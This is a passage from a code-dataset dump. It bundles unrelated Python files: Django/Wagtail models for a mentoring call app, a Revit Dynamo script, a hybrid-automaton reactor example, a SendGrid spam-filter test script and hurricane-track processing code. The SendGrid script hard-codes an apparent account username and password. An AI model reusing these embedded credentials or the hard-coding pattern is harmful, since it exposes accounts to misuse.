data.get('partner_end_time') is not None\n\n def has_timed_out(self):\n return (\n self.end_time is None and\n (timezone.now() - self.start_time > self.TIMEOUT_DELTA))\n\n def dial(self):\n api = comms_models.Api.objects.last()\n call_id = api.make_call(\n self.caller.contact_number, self.receiver.contact_number)\n if call_id:\n self.call_id = call_id\n self.save()\n Event.objects.create(description=\"Call started\",\n event_type=\"start_call\",\n relevant_mentor=self.caller.mentor,\n object_id=self.pk)\n\n def update(self, data=None):\n data = (data or {}).copy()\n\n # We only assign if we aren't going to be overwriting a non-None value\n # with a None value. This allows us to handle some situations where\n # updates are received in the wrong order. Note that we are not\n # handling out-of-order updates where both the previous and new value\n # are not `None`, but this should be okay for our use case.\n assign(self, pick(data, self.UPDATE_FIELDS), prefer_not_none=True)\n\n self._create_entering_cdrs(data.get('call_data_records', ()))\n\n if data.get('ended', self._infer_ended(data)):\n self.handle_ended_successful(data)\n\n self.save()\n\n def ended(self, data=None):\n return self.update(conjoin(data, {'ended': True}))\n\n def handle_ended_successful(self, data):\n self.end_time = data.get('end_time', timezone.now())\n\n self.feedback_task = Task.objects.create(\n mentor=self.caller.mentor,\n description=(\"Complete feedback for call at %s on %s\") % (\n self.start_time.strftime('%H:%M'),\n self.start_time.strftime('%Y-%m-%d')))\n\n Event.objects.create(\n description=\"Call ended\",\n event_type=\"end_call\",\n relevant_mentor=self.caller.mentor,\n object_id=self.pk)\n\n if self.caller.mentor.notification_settings.call_ended:\n send_notification_to_fcm(\n self.caller.mentor,\n \"CALL_ENDED\",\n str(self.end_time),\n self.pk,\n use_notification=False)\n\n\nclass CallDataRecord(models.Model):\n class Meta:\n verbose_name = 'Call attempt'\n\n call = models.ForeignKey(\n 'call',\n related_name=\"call_data_records\",\n verbose_name=\"Call\")\n\n partner_id = models.CharField(max_length=255)\n start_time = models.DateTimeField()\n status = models.CharField(max_length=255)\n\n\nclass TopicIndexPage(Page):\n parent_page_types = []\n subpage_types = ['Topic']\n\n\nclass Topic(Page):\n parent_page_types = ['mentor.TopicIndexPage']\n subtitle = models.TextField(null=True, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n\nTopic.content_panels = [\n FieldPanel('title', classname='full title'),\n FieldPanel('subtitle', classname='full'),\n ImageChooserPanel('image'),\n]\n\n\nclass Post(Comment):\n parent = models.ForeignKey('self', blank=True, null=True)\n posted_to = models.ForeignKey('Mentor', blank=True, null=True)\n\n\n@receiver(post_save, sender=Post,\n dispatch_uid=\"set_latest_post_date\")\ndef set_latest_post_date(instance, **kwargs):\n mentor = Mentor.objects.filter(user=instance.user).last()\n mentor.latest_post_date = instance.submit_date\n mentor.save()\n\n\nclass PostLike(models.Model):\n mentor = models.ForeignKey('Mentor')\n post = models.ForeignKey('Post', related_name='likes')\n\n\nclass CategoryIndexPage(Page):\n parent_page_types = []\n subpage_types = ['Category']\n\n\nclass Category(Page):\n parent_page_types = ['mentor.CategoryIndexPage']\n image = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n color = models.TextField(default='', null=True, blank=True)\n about = models.TextField(null=True, blank=True)\n goal = models.TextField(null=True, blank=True)\n active = models.BooleanField(default=True)\n\n subpage_types = ['Activity']\n\n\nCategory.content_panels = [\n FieldPanel('title', classname='full title'),\n ImageChooserPanel('image'),\n FieldPanel('color'),\n FieldPanel('about', classname='full'),\n FieldPanel('goal', classname='full'),\n]\n\n\nclass Activity(Page):\n poster = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n icon = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n objective = models.TextField(null=True, blank=True)\n lesson_rationale = models.TextField(null=True, blank=True)\n instructions = models.TextField(null=True, blank=True)\n prompts = models.TextField(null=True, blank=True)\n reflection_points = models.TextField(null=True, blank=True)\n skills_developed = models.TextField(null=True, blank=True)\n active = models.BooleanField(default=True)\n\n def is_complete(self, mentor):\n contact = Contact.objects.get(user=mentor)\n\n qs = BaseCallNote.objects.filter(\n call__activity=self,\n call__caller=contact,\n mentor=contact)\n\n qs = qs.filter(\n Q(CallNoteV1___objective_achieved=True) |\n Q(CallNoteV2___activity_progress='COMPLETED'))\n\n return qs.exists()\n\n def parent(self):\n return Category.objects.ancestor_of(self).first().pk\n\n\nActivity.content_panels = [\n FieldPanel('title', classname='full title'),\n ImageChooserPanel('poster'),\n ImageChooserPanel('icon'),\n FieldPanel('objective', classname='full'),\n FieldPanel('lesson_rationale', classname='full'),\n FieldPanel('instructions', classname='full'),\n FieldPanel('prompts', classname='full'),\n FieldPanel('reflection_points', classname='full'),\n FieldPanel('skills_developed', classname='full'),\n]\n\n\nclass FAQIndexPage(Page):\n parent_page_types = []\n subpage_types = ['FAQ']\n\n\nclass FAQ(Page):\n description = models.TextField(null=True, blank=True)\n subpage_types = []\n search_fields = Page.search_fields + [index.SearchField('description')]\n\n class Meta:\n verbose_name = 'FAQ'\n\n\nFAQ.content_panels = [\n FieldPanel('title', classname='full title'),\n FieldPanel('description'),\n]\n\n\nclass BlogIndexPage(Page):\n parent_page_types = []\n subpage_types = ['Blog']\n\n\nclass Blog(Page):\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+')\n\n thumbnail = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+')\n\n body = StreamField([\n ('heading', blocks.CharBlock(classname=\"full title\")),\n ('paragraph', MarkDownBlock()),\n ('image', ImageChooserBlock()),\n ('list', blocks.ListBlock(blocks.CharBlock(label=\"Item\"))),\n ('numbered_list', blocks.ListBlock(blocks.CharBlock(label=\"Item\"))),\n ], null=True, blank=True)\n\n active = models.BooleanField(default=True)\n\n created_at = models.DateTimeField(default=timezone.now)\n\n subpage_types = []\n search_fields = Page.search_fields + [index.SearchField('body')]\n\n @property\n def is_hidden(self):\n return not self.live or not self.active\n\n class Meta:\n verbose_name = 'Blog'\n\n\nBlog.content_panels = [\n FieldPanel('title', classname='full title'),\n ImageChooserPanel('image'),\n StreamFieldPanel('body'),\n]\n\n\nclass Message(models.Model):\n time_sent = models.DateTimeField(auto_now_add=True)\n sender = models.ForeignKey('Contact', related_name=\"sender\")\n recipient = models.ForeignKey('Contact', related_name=\"recipient\")\n message_type = models.CharField(\n blank=False,\n null=False,\n default=\"\",\n max_length=10,\n choices=(\n ('USER', 'Individual'),\n ('SYSTEM', 'Automated')))\n content = models.CharField(\n blank=False,\n null=False,\n max_length=144,\n default=\"\")\n\n @classmethod\n def send_and_create(cls, *args, **kwargs):\n msg = cls(*args, **kwargs)\n msg.send()\n msg.save()\n return msg\n\n def send(self):\n api = comms_models.Api.objects.last()\n api.send_message(\n self.sender.contact_number,\n self.recipient.contact_number,\n self.content\n )\n\n def receive_message(self):\n Event.objects.create(\n description=\"Received message: '\" + self.content + \"'\",\n event_type=\"receive_message\",\n relevant_mentor=self.recipient.mentor, object_id=self.pk)\n\n if self.recipient.mentor.notification_settings.new_message:\n send_notification_to_fcm(self.recipient.mentor, \"NEW_MESSAGE\",\n self.content, self.pk)\n\n def __str__(self):\n return self.content\n\n\nclass ScheduledCall(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n call_time = models.DateTimeField(blank=False,\n null=False)\n caller = models.ForeignKey('Mentor')\n callee = models.ForeignKey('Mentee')\n activity = models.ForeignKey('Activity', blank=True, null=True)\n\n def notify_callee(self, message):\n return Message.send_and_create(\n sender=self.caller, recipient=self.callee,\n content=message, message_type='SYSTEM')\n\n def notify_callee_scheduled(self):\n self.notify_callee(\n \"Your next mentoring call has been scheduled for %s\" %\n display_datetime(self.call_time))\n\n def notify_callee_rescheduled(self, new_time):\n self.notify_callee(\n \"Your mentoring call on %s has been moved to %s\" %\n (display_datetime(self.call_time), display_datetime(new_time)))\n\n def notify_callee_cancelled(self):\n self.notify_callee(\n \"Your mentoring call on %s has been cancelled\" %\n display_datetime(self.call_time))\n\n def remind_caller(self, reminder_type, text=None):\n if text is None:\n text = \"You have a call scheduled for %(time)s.\"\n\n text = text % {\n 'date': display_date(self.call_time),\n 'time': display_time(self.call_time),\n }\n\n result = send_notification_to_fcm(\n self.caller, reminder_type, text, self.pk)\n\n CallReminder.objects.create(\n scheduled_call=self,\n reminder_type=reminder_type)\n\n return result\n\n\nclass CallReminder(models.Model):\n scheduled_call = models.ForeignKey('ScheduledCall')\n reminder_type = models.CharField(max_length=20)\n\n\nclass Task(models.Model):\n STATUS = (\n ('pending', 'Pending'),\n ('in-progress', 'In progress'),\n ('done', 'Done')\n )\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(blank=True, null=True)\n mentor = models.ForeignKey('Mentor')\n description = models.CharField(blank=False,\n null=False,\n max_length=200,\n default=\"\")\n link = models.URLField(blank=True, null=True, default=\"\")\n due_date = models.DateField(blank=True, null=True)\n status = models.CharField(max_length=50,\n choices=STATUS,\n default='pending')\n\n\nclass Event(models.Model):\n occured_at = models.DateTimeField(auto_now_add=True)\n event_type = models.CharField(blank=False,\n null=False,\n max_length=50,\n default=\"\")\n description = models.CharField(blank=False,\n null=False,\n max_length=200,\n default=\"\")\n relevant_mentor = models.ForeignKey('Mentor')\n object_id = models.PositiveIntegerField(null=True, blank=True)\n\n\nclass Feedback(models.Model):\n received_at = models.DateTimeField(\n null=True,\n auto_now_add=True,\n verbose_name=\"System received IVR feedback\")\n start_time = models.DateTimeField(null=True)\n sender = models.ForeignKey('Contact', related_name=\"feedback\")\n call = models.ForeignKey('Call', blank=True, null=True,\n related_name=\"feedback\")\n question_one = models.CharField(max_length=200, null=True, blank=True)\n question_two = models.CharField(max_length=200, null=True, blank=True)\n question_three = models.CharField(max_length=200, null=True, blank=True)\n question_four = models.CharField(max_length=200, null=True, blank=True)\n complete = models.BooleanField(\n default=True,\n help_text=(\n \"A status flag indicating whether the feedback survey was fully\"\n \" completed. It should be set to true if the survey was fully\"\n \" completed and false if the survey was submitted incomplete.\"))\n\n class Meta:\n verbose_name = 'IVR'\n verbose_name_plural = 'IVRs'\n\n\nclass BaseCallNote(PolymorphicModel):\n version = None\n mentor = models.ForeignKey('Contact', related_name=\"call_note\")\n call = models.ForeignKey('Call', related_name=\"call_note\")\n created_at = models.DateTimeField(default=timezone.now)\n\n\nclass CallNoteV1(BaseCallNote):\n version = '1'\n reflection = models.TextField(blank=False, null=False, default=\"\")\n mentee_state = models.TextField(\n blank=False,\n null=False,\n default=\"\",\n choices=(\n ('happy', 'Happy'),\n ('sad', 'Sad'),\n ('bored', 'Bored'),\n ('confused', 'Confused'),\n ('upset', 'Upset'),\n ('withdrawn', 'Withdrawn')))\n objective_achieved = models.BooleanField(default=False)\n activity_helpful = models.TextField(\n blank=False,\n null=False,\n default=\"\",\n choices=(\n ('0', 'Not at all'),\n ('1', 'A little'),\n ('2', 'Somewhat'),\n ('3', 'Quite a bit'),\n ('4', 'A lot')))\n call_quality = models.TextField(\n blank=False,\n null=False,\n default=\"\",\n choices=(\n ('EXCELLENT', 'Excellent'),\n ('OK', 'Ok'),\n ('INAUDIBLE', 'Inaudible'),\n ('DROPPED', 'Dropped'),\n ('DELAYED', 'Delayed')))\n\n\nclass CallNoteV2(BaseCallNote):\n version = '2'\n call_result = models.TextField(\n choices=(\n ('COMPLETED', 'Completed'),\n ('PARTIALLY_COMPLETED', 'Partially completed'),\n ('MENTEE_NOT_AVAILABLE', 'Mentee not available'),\n ('MENTEE_RESCHEDULED', 'Mentee rescheduled')))\n activity_progress = models.TextField(\n null=True,\n choices=(\n ('COMPLETED', 'Completed'),\n ('PARTIALLY_COMPLETED', 'Partially completed'),\n ('NOT_USED', 'Not used')))\n reflection = models.TextField()\n mood = models.TextField(\n default=\"\",\n choices=(\n ('HAPPY', 'Happy'),\n ('ENGAGED', 'Engaged'),\n ('EXCITED', 'Excited'),\n ('BORED', 'Bored'),\n ('SAD', 'Sad'),\n ('CONFUSED', 'Confused'),\n ('WITHDRAWN', 'Withdrawn'),\n ('UPSET', 'Upset')))\n objective_achieved = models.TextField(\n blank=True,\n choices=(\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5')))\n rating = models.TextField(\n blank=True,\n choices=(\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5')))\n call_quality = models.TextField(\n blank=True,\n choices=(\n ('EXCELLENT', 'Excellent'),\n ('OK', 'Ok'),\n ('INAUDIBLE', 'Inaudible'),\n ('DROPPED', 'Dropped'),\n ('DELAYED', 'Delayed')))\n\n @property\n def saved_activity(self):\n raise Exception(\"saved_activity is a set-only field\")\n\n @saved_activity.setter\n def saved_activity(self, activity):\n '''\n This is a workaround to be able to change the call's activity when\n creating a call note.\n\n A separate request on the client side for updating the call activity\n may seem more sensible, but this would mean we may end up with a\n half-completed operation if one of the two requests fail, which may\n be a consideration if a device's internet connection was flaky\n (which isn't unlikely).\n\n The better solution would be to change the api so that creating call\n notes was provided as updates to call resources, but this is a larger\n change we don't have time for.\n '''\n self.call.activity = activity\n self.call.save()\n\n\n# alias for backwards compatibility with the rest of the codebase\nCallNote = CallNoteV1\nCALL_NOTE_VERSIONS = (CallNoteV1, CallNoteV2)\n\n\nclass ResetPasswordRequest(models.Model):\n user = models.ForeignKey(User)\n token = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass NotificationSettings(models.Model):\n mentor = models.OneToOneField('Mentor',\n related_name=\"notification_settings\")\n android_registration_token = models.CharField(\n max_length=200, null=True, blank=True,\n help_text=\"Token used to send push notifications\")\n one_min_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 1 minute before it \"\n \"should start.\")\n ten_min_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 10 minutes before it \"\n \"should start.\")\n one_hour_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 1 hour before it \"\n \"should start.\")\n one_day_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 1 day before it \"\n \"should start.\")\n call_ended = models.BooleanField(\n default=True,\n help_text=\"Mentor will be notified every time a call ends.\")\n new_message = models.BooleanField(\n default=True,\n help_text=\"Mentor will be notified every time a new message arrives.\")\n new_tip = models.BooleanField(\n default=True,\n help_text=\"Mentor will be notified every time there is a new Tip for \"\n \"them\")\n\n class Meta:\n verbose_name = 'Notification settings'\n verbose_name_plural = 'Notification settings'\n\n\nclass CustomPushNotification(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n mentor = models.ForeignKey('Mentor')\n text = models.CharField(max_length=200, null=True)\n\n\n@receiver(post_save, sender=CustomPushNotification,\n dispatch_uid=\"send_custom_notification\")\ndef send_custom_notification(sender, instance, created, **kwargs):\n if created:\n send_notification_to_fcm(instance.mentor, \"The Mentor 2 Go team\",\n instance.text, instance.pk)\n\n\n@receiver(post_delete, sender=Contact, dispatch_uid=\"delete_related_user\")\ndef delete_contact_related_user(sender, instance, **kwargs):\n if User.objects.filter(pk=instance.user.pk).exists():\n instance.user.delete()\n\n\ndef create_event_on_call_note_post_save(sender, instance, created, **kwargs):\n if not created:\n return\n\n Event.objects.create(\n event_type='call_notes_created', description='Call notes created',\n relevant_mentor=instance.mentor.mentor, object_id=instance.pk)\n\n if instance.call.activity:\n category = instance.call.activity.get_parent().specific\n activities = category.get_children().live()\n\n if all([\n activity.specific.is_complete(instance.mentor.user)\n for activity in activities\n ]):\n Event.objects.create(\n event_type='all_activities_completed',\n description='All activities completed',\n relevant_mentor=instance.mentor.mentor,\n object_id=category.pk)\n\n\nfor i, version_cls in enumerate(CALL_NOTE_VERSIONS):\n post_save.connect(\n create_event_on_call_note_post_save,\n sender=version_cls,\n dispatch_uid=\"create_event_on_call_note_post_save_v%s\" % (i + 1))\n","sub_path":"mentorship/mentor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":28576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"632005857","text":"import clr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\n\ncats = UnwrapElement(IN[0])\nviews = UnwrapElement(IN[1])\n\nelementlist = list()\nfor cat in cats:\n\tcatlist = list()\n\tfor view in views:\n\t\ttry:\n\t\t\tif view.GetVisibility(cat):\n\t\t\t\tcatlist.append(True)\n\t\t\telse:\n\t\t\t\tcatlist.append(False)\t\n\t\texcept:\n\t\t\tcatlist.append(False)\n\telementlist.append(catlist)\nOUT = elementlist","sub_path":"nodes/0.7.x/python/View.CategoryIsVisible.py","file_name":"View.CategoryIsVisible.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373555294","text":"'''\n*No need to include any internal events as the resulting IEC-61499 has nothing such defined.\n*Supply the initial state as the first element in the list of locations to the Ha class. This eliminates the need to \nhave additional isInitial flags.\n*Do not duplicate any event name or variable name (internal, output or input) as BlokIDE at this point does not \npermit identically named elements and won't load the file. The variable the ODE is in (the internal variable) is declared \nby the compiler automatically. Abstain from using the same ODE variable elsewhere. This issue needs to be fixed.\n'''\n\n# The Reactor Plant example\n# Taken from page 387 of Principles of Cyber-physical systems. - Rajeev Alur.\n# See the inputvector described in reactorin.csv\n# The environment interface is reactorIO.c\n\n\nimport macropy.activate\nfrom language import *\nfrom gen import *\nfrom sympy import *\nimport shac\n\n# ODEs of the system\n\node0 = Ode(sympify(\"diff(x(t))-0.1*x(t)+50\"), sympify(\"x(t)\"), 510, {})\node1 = Ode(sympify(\"diff(x(t))-0.1*x(t)+56\"), sympify(\"x(t)\"), 550, {})\node2 = Ode(sympify(\"diff(x(t))-0.1*x(t)+60\"), sympify(\"x(t)\"), 550, {})\n\n# CHANGED : Added the external interface of the hybrid automaton\n\n# Keys are the external events and the values are a list of external variables those events are associated with.\n# First dictionary correponds to the input and the second to the output. \nextEves = ExternalEvents({Event(\"add1\") : [], Event(\"add2\") : [], Event(\"remove1\") : [], Event(\"remove2\") : [], Event(\"refresh1\") : [], Event(\"refresh2\") : [] }, { })\n# List of external variables. Fist list corresponds to the input and second to the output.\nextVars = ExternalVars([Symbol(\"y\"), Symbol(\"timer1\"), Symbol(\"timer2\")],[])\n\n# The locations of the hybrid automaton\nt0 = Loc(\"t0\", [ode0], [],\n {S(\"x(t)\"): [Guard(S(\"x <= 550\"))]})\nt1 = Loc(\"t1\", [ode1], [],\n {S(\"x(t)\"): [Guard(S(\"x>=510\"))]})\nt2 = Loc(\"t2\", [ode2], [],\n {S(\"x(t)\"): [Guard(S(\"x>=510\"))]})\n\n\n# The edges\ne1 = Edge('t0', 't1', {S(\"x(t)\"): [Guard(S(\"x>=550\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"add1\")])\ne2 = Edge('t1', 't0', {S(\"x(t)\"): [Guard(S(\"x<=510\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"remove1\")])\ne3 = Edge('t0', 't2', {S(\"x(t)\"): [Guard(S(\"x>=550\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"add2\")])\ne4 = Edge('t2', 't0', {S(\"x(t)\"): [Guard(S(\"x<=510\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"remove2\")])\n\n# CHANGED : Added extEves, extVars arguments\nreactorPlant = Ha(\"reactor\", [t0, t1, t2], t0,\n [e1, e2, e3, e4], [], [], extEves, extVars)\n\n\n# Compile\n# shac.compile(reactorPlant)\n","sub_path":"compiler/example generated xml/reactor.py","file_name":"reactor.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"597277056","text":"#!/usr/bin/python\n# Testing Objective: Send message that contains medium spam test string\n\n\nimport sendgrid \nfrom sendgrid import SendGridClient\nfrom sendgrid import Mail\n\n# make a secure connection to SendGrid\nsg = SendGridClient('satest8', 'Sunshine1', secure=True)\n\n# make a message object\nmessage = Mail()\nmessage.set_subject('Spam String Test - Medium')\nmessage.set_text('XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-MXL09*C.34X')\nmessage.set_from('satest8@gmail.com')\n\n# add a recipient\nmessage.add_to('SA ')\n\n# use the Web API to send your message\nsg.send(message)\n\n\n","sub_path":"spam_tests/sendgrid_medium_spam.py","file_name":"sendgrid_medium_spam.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"62113531","text":"from osgeo import gdal, ogr, osr\nimport numpy\nimport pylab, math, os, sys,json,datetime,glob\n\n#########################################################\n#Function for getting HURDAT data into the correct format for subsequent processing\ndef prep_HURDAT(raw_hurdat,csv_folder,storm_split_str = 'AL'):\n check_dir(csv_folder)\n\n #Read in HURDAT data\n o = open(raw_hurdat,'r')\n\n #Split out by storm (lines that start with AL)\n lines = o.read().split(storm_split_str)\n lines = [i for i in lines if i != '']\n o.close()\n\n allJSON = []\n \n #Iterate across each storm\n for h in lines:\n\n h_out = []\n\n #Clean up the data\n h = h.split('\\n')\n if len(h) > 1:\n h = [i.split(',') for i in h]\n header = h[0]\n header = [i.strip() for i in header]\n h = h[1:]\n \n h = [[i2.strip() for i2 in i] for i in h if i[0] != '' and int(i[6]) > 0 and int(i[7]) > 0]\n \n #If there are obs for the storm, process it\n if len(header) ==4 and len(h) > 1 and len(header[0]) > 0:\n name = header[1]\n if name == 'UNNAMED':\n name = header[2]\n year = header[0][2:]\n out_csv = os.path.join(csv_folder,name + '-'+year+'.csv')\n if os.path.exists(out_csv) == False:\n hLines = []\n hLinesCSV = ''\n #Set up outputs for storm\n hObj = {}\n\n hObj['name'] = name\n hObj['year'] = int(year)\n\n for line in h:\n lineObj = {}\n\n #Get relevant fields and format them\n date = line[0]\n time = line[1]\n y = int(date[:4])\n m = int(date[4:6])\n d = int(date[6:])\n h =int(time[:2])\n minutes = int(time[2:])\n \n date = datetime.datetime(y,m,d,h,minutes)\n out_date = date.strftime(\"%b %d,%H:%M:%S GMT\")\n \n lineObj['date'] = out_date\n \n lat = float(line[4][:-1])\n lon = float(line[5][:-1])\n if line[4][-1] == 'S':lat = lat*-1\n if line[5][-1] == 'W':lon = lon*-1\n lineObj['lat'] = lat\n lineObj['lon'] = lon\n lineObj['pres'] = int(line[7])\n lineObj['wspd'] = int(line[6])\n hLines.append(lineObj)\n\n\n hLinesCSV += ','.join([out_date,str(lineObj['lat']),str(lineObj['lon']),str(lineObj['wspd']) + ' mph',str(lineObj['pres']) + ' mb\\n'])\n \n \n hObj['track'] = hLines\n allJSON.append(hObj)\n \n o = open(out_csv,'w')\n o.write(hLinesCSV)\n o.close()\n\n #Refine storm track\n try:\n refineStormTrack(out_csv,name,year)\n except Exception as e:\n print(e)\n #Write a master json- not used currently \n o = open(csv_folder + os.path.basename(os.path.splitext(raw_hurdat)[0]) + '_all.json','w')\n o.write(json.dumps(allJSON))\n o.close()\n############################################################## \n#Function for interpolating track input entries\ndef refineStormTrack(input_track,storm_name,storm_year):\n Today = datetime.datetime.utcnow()\n\n stormname,stormyear =storm_name,storm_year\n stormyear = int(stormyear)\n csvname = os.path.splitext(input_track)[0]\n outfile = open(csvname+'-refined.csv','w')\n outfileJSON = open(csvname+'-refined.json','w')\n refinement_factor = 3\n\n def GetTime( X ):\n mytime = X.split(',')[1].split(':')\n hour = int(mytime[0])\n mins = 60*int(hour)+int(mytime[1].split(' ')[0])\n return mins\n\n def GetInfo( X ):\n fields = X.strip().split(',')\n lat = float( fields[2])\n lon = float( fields[3])\n WS = float( fields[4].split(' ')[0] )\n Pr = float( fields[5].split(' ')[0])\n return [lat,lon,WS,Pr]\n\n def Interp( s, e, f ):\n return (1.-f)*s+f*e\n\n # read csv file of storm track data\n trackfile = open(csvname + '.csv','r')\n track = trackfile.readlines()\n trackfile.close()\n\n # set start date\n start = track[0]\n start_time = GetTime( start )\n start_info = GetInfo( start )\n\n # loop through file\n \n jsonList = []\n for end in track[1:]:\n # read end date\n end_time = GetTime( end )\n end_info = GetInfo( end )\n if start_time>end_time:\n end_time += 24*60\n\n # loop over time between\n desired_dt = int( (end_time-start_time)/refinement_factor )\n for t in range(0, end_time-start_time, desired_dt):\n # linear interpolate time, position and other parameters\n fraction = float(t) / float(end_time-start_time)\n new_mins = Interp( start_time, end_time, fraction )\n new_lat = Interp( start_info[0], end_info[0], fraction )\n new_lon = Interp( start_info[1], end_info[1], fraction )\n new_WS = Interp( start_info[2], end_info[2], fraction )\n new_Pr = Interp( start_info[3], end_info[3], fraction )\n\n # write new record\n hr =int(new_mins/60.)\n mins = new_mins-hr*60\n if hr > 23:\n hr = 0\n fields = start.strip().split(',')\n\n OutputDate = datetime.datetime.strptime(fields[0].strip(), '%b %d')\n if stormyear > Today.year:\n Forecast = 'F'\n elif stormyear == Today.year:\n if OutputDate.month > Today.month:\n Forecast = 'F'\n elif OutputDate.month == Today.month:\n if OutputDate.day > Today.day:\n Forecast = 'F'\n elif OutputDate.day == Today.day:\n if hr > Today.hour:\n Forecast = 'F'\n else:\n Forecast = 'O'\n else:\n Forecast = 'O'\n else:\n Forecast = 'O'\n else:\n Forecast = 'O'\n if Forecast == 'F':\n refinement_factor = 24\n out = '%s,%02d:%02d GMT,%4.2f,%4.2f,%d mph,%d mb,%s,%s,%s\\n'% (fields[0],hr,mins,new_lat,new_lon,new_WS,new_Pr,fields[-2],fields[-1], Forecast)\n outfile.write( out )\n\n fields = out.strip().split(',')\n wspd = fields[4].split('m')[0]\n pres = fields[5].split('m')[0]\n jsonList.append({'date':fields[0]+':'+fields[1],\n 'lat':float(fields[2]),\n 'lon':float(fields[3]),\n 'wspd':float(wspd),\n 'pres':float(pres),\n 'FO':fields[-1]})\n start = end\n start_time = GetTime(end)\n start_info = end_info\n\n outfileJSON.write(json.dumps(jsonList))\n outfile.close()\n outfileJSON.close()\n#########################################################\n#Function for creating directory if it doesn't exist\ndef check_dir(in_path):\n if os.path.exists(in_path) == False:\n print('Making dir:', in_path)\n os.makedirs(in_path)\n#########################################################\n#Adapted from https://gis.stackexchange.com/questions/167069/simple-gdal-coordinate-conversion\n#Converts a coordinate in one projection to another\ndef geogToProj(lng,lat,fromEPSG = 4326,toEPSG = 32616):\n InSR = osr.SpatialReference()\n InSR.ImportFromEPSG(fromEPSG) # Geographic\n OutSR = osr.SpatialReference()\n OutSR.ImportFromEPSG(toEPSG) #output\n\n Point = ogr.Geometry(ogr.wkbPoint)\n Point.AddPoint(lng,lat) # use your coordinates here\n Point.AssignSpatialReference(InSR) # tell the point what coordinates it's in\n Point.TransformTo(OutSR) # project it to the out spatial reference\n return {'x':Point.GetX(),'y':Point.GetY()} # output projected X and Y coordinates\n#########################################################\ndef getTransform(centerX,centerY,width,height,res):\n left = centerX - math.floor(width/2.)*res\n top = centerY + math.ceil(height/2.)*res\n return [left, float(res), 0.0, top, 0.0, -1. * res]\n##############################################################################################\n#Converts between Numpy and GDAL data types\ndt_dict = {'u1': 'Byte', 'uint8' : 'Byte', 'uint16': 'UInt16','u2': 'UInt16', 'u4': 'UInt32', 'i2' : 'Int16','i4':'Int32', 'int16':'Int16', 'Float32' : 'float32','float32' : 'Float32', 'Float64' : 'float64','float64' : 'Float64'}\n##############################################################################################\n#########################################################\ndef writegeotiff( transform, Output, Title, ncols, nrows,epsg,out_no_data = 255,dt = 'u1'):\n output_raster = gdal.GetDriverByName('GTiff').Create(Title,int(ncols), int(nrows), 1 ,eval('gdal.GDT_'+dt_dict[dt]))#Float32)\n output_raster.SetGeoTransform( transform )\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(epsg)\n output_raster.SetProjection( srs.ExportToWkt() )\n output_raster.GetRasterBand(1).SetNoDataValue(out_no_data)\n \n output_raster.GetRasterBand(1).WriteArray( Output.astype(dt)) \n Min,Max,Mean,Std = output_raster.GetRasterBand(1).ComputeStatistics(0)\n output_raster.GetRasterBand(1).SetStatistics(Min,Max,Mean,Std)\n output_raster.FlushCache()\n#########################################################\ndef CalcStormMotion(y1,y2,x1,x2,dt):\n # return storm velocity components in meters per second\n V = (y2-y1) * 111. *1000/ float(dt)\n U = (x2-x1) * math.cos(y1*math.pi/180.) * 111. *1000/ float(dt)\n return U,V\n#########################################################\ndef getWind(current,future,frames_output_folder,storm_name,window_width,window_height,res,wind_nodata,wind_threshold,epsg,wind_summary,write_frames = False):\n mytime = current['date'].split(':')\n cseconds = 3600*int(mytime[1])+60*int(mytime[2].split()[0])\n mytime = future['date'].split(':')\n fseconds = 3600*int(mytime[1])+60*int(mytime[2].split()[0])\n if fseconds < cseconds:\n fseconds += 24*60*60\n\n out_filename = os.path.join(frames_output_folder,storm_name+'_'+'_'.join([current['date'],future['date']]).replace(' ','_').replace(':','_')+'_wind.tif')\n print('Creating:',out_filename)\n CurrentLat = current['lat']\n CurrentLon = current['lon']\n FutureLat = future['lat']\n FutureLon = future['lon']\n\n MaxWind = current['wspd']\n CentralPressure = current['pres']\n FutureMaxWind = future['wspd']\n FutureCentralPressure = future['pres']\n HurricaneMotionU, HurricaneMotionV = CalcStormMotion(CurrentLat,FutureLat,CurrentLon,FutureLon,fseconds-cseconds)\n\n Lat = CurrentLat\n Lon = CurrentLon\n Wind = MaxWind\n Pressure = CentralPressure\n\n # xc, yc 